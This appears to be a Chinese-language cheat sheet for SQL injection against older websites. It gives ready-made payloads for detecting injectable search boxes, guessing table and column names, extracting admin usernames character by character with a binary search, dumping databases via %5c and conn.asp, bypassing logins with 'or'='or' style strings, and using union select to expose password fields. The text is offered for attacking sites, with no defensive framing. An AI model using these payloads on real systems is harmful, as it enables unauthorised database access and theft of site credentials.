搜索型判断是否有注入: 简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞。然后搜索%,如果正常返回,说明95%有洞了。 说明:加入如"&"、"["、"]"、"%"、"$"、"@"等特殊字符,都可以实现,如果出现错误,说明有问题。 操作: 搜索一个关键字,比如2006吧,正常返回所有2006相关的信息,再搜索2006%'and 1=1 and '%'='和 2006%'and 1=2 and '%'=',存在异同的话,就是100%有洞了。关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='% 将and 1=1 换成注入语句就可以了
猜表名 and exists (select * from 表名) 说明:意思与上面一样,只是用的语名不一样。
猜列名 and (select count(列名) from 表名)>0 说明:如果我们输入的列名猜解正确否反回正常页面
猜长度 and (select top 1 len(username) from admin)>0 说明:如果我们输入的最后一位数据返回错误,而错误前一位数字返回正确,说明我所猜解的长度 为正确。
猜内容 and (select top 1 asc(mid(username,1,1)) from admin)>50 ascii码1-128 说明:如果我们输入的最后一位数据返回错误,而错误前一位数字返回正确,说明我所猜解的数字正确。(可以使用折半法猜内容) 折半法:最小值与最大值差的一半,比如输入50返正确,输入100返回错误,折半后输入75。 两种常见爆库 1、%5c 2、conn.asp
常见的:'or'='or'万能密码登陆 ’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有 : ’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’ a’=’a 一个很老的利用方法,主要用于一些比较老的网站。
联合查询注入(union查询) 操作步骤: 1>在正常语句后台加入 and 1=2 union select * form 表名,其中*号代表字段数量,从1一直追加 (and 1=2 union select 1,2,3,4 form 表名)如果字段数正确就会有暴错 2>在页面显示数字的地方用真实得到的字段名代替,如:username,password. 3>在页面字段值处暴出真实的数据库字段值。